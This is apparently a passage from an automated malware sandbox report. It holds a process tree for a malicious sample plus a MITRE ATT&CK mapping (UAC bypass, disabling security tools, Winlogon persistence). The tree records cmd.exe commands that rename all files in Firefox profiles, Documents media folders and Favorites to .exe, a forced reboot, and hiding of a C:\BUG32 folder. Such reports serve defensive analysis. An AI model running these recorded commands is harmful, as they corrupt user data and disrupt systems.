    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\*.*" "*.exe"
        5⤵
        
        PID:1720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\*.*" "*.exe"
        5⤵
        
        PID:1100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.Admin\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\*.*" "*.exe"
        5⤵
        
        PID:620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\bookmarkbackups\*.*" "*.exe"
        5⤵
        
        PID:1800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\crashes\*.*" "*.exe"
        5⤵
        
        PID:1836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\datareporting\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\extensions\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\minidumps\*.*" "*.exe"
        5⤵
        
        PID:1948
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\security_state\*.*" "*.exe"
        5⤵
        
        PID:1376
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\sessionstore-backups\*.*" "*.exe"
        5⤵
        
        PID:744
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\*.*" "*.exe"
        5⤵
        
        PID:880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\crashes\events\*.*" "*.exe"
        5⤵
        
        PID:1724
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\datareporting\archived\*.*" "*.exe"
        5⤵
        
        PID:820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\datareporting\archived\2022-02\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\default\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\*.*" "*.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\temporary\*.*" "*.exe"
        5⤵
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\default\moz-extension+++fa070f1c-a2b4-4179-b766-c7aa09203140^userContextId=4294967295\*.*" "*.exe"
        5⤵
        
        PID:1364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\default\moz-extension+++fa070f1c-a2b4-4179-b766-c7aa09203140^userContextId=4294967295\idb\*.*" "*.exe"
        5⤵
        
        PID:576
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\default\moz-extension+++fa070f1c-a2b4-4179-b766-c7aa09203140^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files\*.*" "*.exe"
        5⤵
        
        PID:2044
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\*.*" "*.exe"
        5⤵
        
        PID:1524
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\*.*" "*.exe"
        5⤵
        
        PID:1320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\*.*" "*.exe"
        5⤵
        
        PID:1760
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\*.*" "*.exe"
        5⤵
        
        PID:2024
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Music\*.*" "*.exe"
        5⤵
        
        PID:1008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Pictures\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Videos\*.*" "*.exe"
        5⤵
        
        PID:1900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Links\*.*" "*.exe"
        5⤵
        
        PID:840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Links for United States\*.*" "*.exe"
        5⤵
        
        PID:1440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Microsoft Websites\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\MSN Websites\*.*" "*.exe"
        5⤵
        
        PID:1084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\Windows Live\*.*" "*.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\System32\shutdown.exe
        
        "C:\Windows\System32\shutdown.exe" -r -t 05
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
    - - C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +h "C:\BUG32"
        5⤵
        Views/modifies file attributes
        
        PID:1368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-384664596157828060510915956488571520011338282532756356857-589379012-1385153735"
1⤵
PID:1252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1668966275-1758334566386119801806968794-442444649-11854139921213232164-689260452"
1⤵
PID:1652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1270814719-1368614139-1247279416-2004701576849442124-811313397263697082-1428088485"
1⤵
PID:1492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2302913752104574320-1126015295-438076350-1965962295-20340510743852212081902103066"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17260224341952196351-1595980895-1677008814-35386921648928691-10494135161305159113"
1⤵
PID:1724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2084861286823389701273775844-1739762588670670336071872971214548336-33787244"
1⤵
PID:800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14868672281010467623-197132369-15156801062087819259-155945065-1335479072117049602"
1⤵
PID:820

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1735941810-1031518264-20694164648010904624223248-55686100413654715421980694308"
1⤵
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1484879844523516355-2103129282284389657-15025760791485132653-1723443527-1621446480"
1⤵
PID:748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1547448654-246772059-8870197391919519737887789439-1580687181-933911390-594874454"
1⤵
PID:1112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-758833238-74409341384597967-662802614-1583520897598096343-706680281761531120"
1⤵
PID:728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-307551446-5193500944049541321345808034-1883162955-20047467382053516365-1620901014"
1⤵
PID:548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-853609934-1208646256153187179-1249519347-2077513749538709818-260461671-1062699288"
1⤵
PID:1368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1437375111-422529082097685607191521048717717784399318505651694348581-244449307"
1⤵
- Suspicious behavior: RenamesItself
PID:1636

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "594949322-13181264-851845900-2066751777-132294490214086694251125611646-1024215299"
1⤵
PID:1552

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1514428399-1279975968125860194-21500370-137589898-2074963455-209082132981128887"
1⤵
PID:1436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1059844581229613411571594783-15788673781557939501816004201941204821269788338"
1⤵
PID:1628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1818301611-1682546066-1202173850179088601084856307111379976376065720702106743387"
1⤵
PID:748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1226444282-1676309752-737604772-1346957398-184584239210263433961741724189-354889230"
1⤵
PID:2012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "304622415-1700237008-281720525632984753-4974700841318379252-1385484074-1342417586"
1⤵
PID:916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2031766522-217956682-1645872376-1367660698494715055-1407067889-100523367514157411"
1⤵
PID:2040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1794057665-952911297-12748547856704238321316574592-773021162-1621106586449546373"
1⤵
PID:1944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-21399561811160202244-787909183-2025042364-1213704041-12814755221966952916-7094524"
1⤵
PID:888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-46714685310697431601611664046688661358-8444940963856155531690982001-712464229"
1⤵
PID:472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1374749067923356031-103603871611071206591715124936-4817494471227360327370287628"
1⤵
PID:1212

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "134965594819497975691268450740482786730-421934851-1673103041280268530119042619"
1⤵
PID:1588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2502710921838362734-1689657988-15456109210213402861552460619755787006-883956551"
1⤵
PID:1112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "892394551170936992178685387-1033695790136349274916564897021158164904398489449"
1⤵
PID:1132

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13923254071998087243-10393114064019632729946122811084251952127584777-1558109920"
1⤵
PID:1076

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-21252423681473967912206371121118310282062829936161482193231-1992692805699651587"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1081788736-909903961-1501179522-609563887-544734446581580842-16822984-2137920504"
1⤵
PID:1496

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1625487375-926103424-1007469843-2023838310-596002802-1146661132-1477994970567049099"
1⤵
PID:288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-466138517-167009062862612160-19921028471904535944-465089618-1723921385-2003128110"
1⤵
PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "627279665-721129449-1161310330-861988539-142152321119335623501035905570-254451389"
1⤵
PID:1492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-203174220129007648192651712-188688088718217717981703363052-1776581769-915797191"
1⤵
PID:728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2118811970965651461-851457404-1120066240711712309-1188409675-1425809048510335522"
1⤵
PID:472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4149006941926365558-114254506361571667-731003358-1713717112-229943794-354635640"
1⤵
PID:1108

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13455095511246662439-48824564-313117308-1353330923-4551608461053401420-1150610486"
1⤵
PID:856

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-918086025-155763955961153221463167981496775692918051206617268303892031865122"
1⤵
PID:1892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2881331551734399604-1257820310-180501251-102305837-886753400-20293414681839365996"
1⤵
PID:2012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "875658555-488435943116348335939832062-9290763741677498619-1975555168-1027901433"
1⤵
PID:1252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-423616527-128559810817590658091176630287-714161552-802973847-1733800547-1764839500"
1⤵
PID:1820

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "151332653315408469961144375928-150566897277779764891753820-14953601031429295928"
1⤵
PID:840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1382070288-8125952721966428412-582648534-590393420-724584391-812308111-1434632809"
1⤵
PID:1152

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1265286416-2135386862-187383927314233096221885237367-1658027419-147041833927268188"
1⤵
PID:1936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1354345498-7987365551661239224550844961-1114319059-1988369525-12290280882109446975"
1⤵
PID:1832

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1136923970-73294520513525413145392200111203438216-934397873-15272047461575228562"
1⤵
PID:1112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2131161156-286520549-86057469610525629-1672915164-1941927450189531473-1369219242"
1⤵
PID:2020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13273256471709622771-2063219243-1034476098-1041136505575114946-1144878018-1419373729"
1⤵
PID:1972

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "146003694719898580569546121331691064371-629927159-13692983679496697411573061342"
1⤵
PID:1748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "958400699126717496-1541804311-1717715046-17914380271230484800698337021-1308614442"
1⤵
PID:1944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1752776964-12391888021316013025-1128652432297838247-1571048196-1792863856-1764337973"
1⤵
PID:1664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1965662168-101486334320361815571709044210-758586175-322135855-1809907949-1090003233"
1⤵
PID:364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2107490848-1737711307-1099301369284004517-1245852827-583995626-754714084-1083547350"
1⤵
PID:1320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1715898697-1620050552-332749392-1914375600-992960902-584895454374617228-837545316"
1⤵
PID:980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-74638152-1011908149-3455627881306355060-362163628279187602-13731249231066983025"
1⤵
PID:1708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1023233482-806199558-2123986892-17519792851671262804130223918015926513531706296036"
1⤵
PID:1584

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1200082821-8674369868549734371670384556-10615245031205484299102582675-1080866957"
1⤵
PID:1604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-451367902-365067320-1853770448-753428189-1083009341-10587953931265384715-1501269257"
1⤵
PID:892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1793741710-134557452-1612038935-636191959431007926862683834-160704949-1566634111"
1⤵
PID:860

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "854136599774861497-19992703093773078184802788101257962302-1229453124646465341"
1⤵
PID:924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9950687301326453289173154517074871236493874253-1491303155-19003491-30851713"
1⤵
PID:1176

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1365779447-49316475476431328-1910957516690902906-688883970-2065197847518511502"
1⤵
PID:2004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-925675456-453009338965003383-2024212079-59952947445377521-1218964549-293019908"
1⤵
PID:1080

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14529811971913661906-613660746-1080533388-1549621130-1317465740-414608439-162205723"
1⤵
PID:956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15675696751119877372-1210352730-1056691110-1564905289-17735693832115512378-2033969139"
1⤵
PID:1700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1897115321630260741-1170027265960921859-89309611410076475401900028872-1116498732"
1⤵
PID:2008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-770187871-15550150213663612164043307091340078620-54593228531427703137546092"
1⤵
PID:1224

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7510655572009625945-2073298447-21402666243432136881818066962105974128-285728132"
1⤵
PID:836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1830811539-201805674321168832621598669885-93490839219945887471640376874774813459"
1⤵
PID:676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "91292354-16245783861426915644-2146124099502863859-1098038051488720091534834649"
1⤵
PID:1332

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6394683271016195426-823739453-1730973194108677001-1857020764-1608818034-1092268867"
1⤵
PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6949234991604761516331879380108607517318270916172066120571675353957-1752027650"
1⤵
PID:796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1381140403-15170654042187715251787754971-7664407781435840537-788258356-1558348887"
1⤵
PID:1616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1717602397-4374521061949303915-3692039305275671211653479206-1129548551-928585116"
1⤵
PID:1196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2250088871634181271961694113885648167-1331334533-18310667336567646981774317058"
1⤵
PID:1004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-200834137378003830-762276625789200756-181234164515814950751965250893-1843432610"
1⤵
PID:1144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12104840861770168293-1603195942-2280583729149574341291106539-421384917-1684061887"
1⤵
PID:1792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "673767800623493463-583959852-1054818832-8159109911755957048984708866-2055420344"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-444705397-406093490-18551219215732523863070545631529276464-17308709281852081765"
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "788326461539203377-714280661-1560768551-5087304625592631271693188584233295013"
1⤵
PID:1928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2141962403683990861-158330019-2132776692-1547512034659889314-20645031451179269764"
1⤵
PID:748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1177421620537975370-1276145448605348426-1616893056-939389509938550227-589453173"
1⤵
PID:324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11760712081334492370-1148160208-1094266279732348683502459946-6718956871344865028"
1⤵
PID:620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13302520092106744280-798124499986651385-1976772423-871488469-1307305041-2016271759"
1⤵
PID:1960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2145585542-809659988646861372197038717669432188110525398131159368144-141276485"
1⤵
PID:1836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2009080377399573472699608774-21370336101574773331134046105122712834-2014548816"
1⤵
PID:1132

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17527412051380941049184465809016729423151169963552-276178795-10465212531702305994"
1⤵
PID:1116

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1508611984-382926666-20139146858998770871328515812-19052905442104302519-680052873"
1⤵
PID:776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1198675903-142621812558179326516127798964660838239609612617953042302042867067"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1229187403-3506857291698457806-275596230-8298662102028819358-523991201279942874"
1⤵
PID:1968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-601157505-855454693-986417325-1612162018-12672065681228663991-1974048297-634098745"
1⤵
PID:304

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2010786774841452680-1776613094-8590025110877830741069054748483886170-40006944"
1⤵
PID:1892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2083925317-8413145232132910638-559644095246035252354550053-870705427-1990174853"
1⤵
PID:916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-43540195-13658059051216305544539820281447547513-846458916168609080-1329084512"
1⤵
PID:1484

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You are about to be logged off -m Windows will shut down in less than a minute. -a 3
1⤵
PID:2044

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1652

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Change Default File Association

T1042

Hidden Files and Directories

T1158

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1112-127-0x00000000028A0000-0x00000000028A1000-memory.dmp

Filesize
4KB

Download
memory/1476-54-0x0000000075BE1000-0x0000000075BE3000-memory.dmp

Filesize
8KB

Download
memory/1652-125-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/1716-71-0x000007FEFC401000-0x000007FEFC403000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads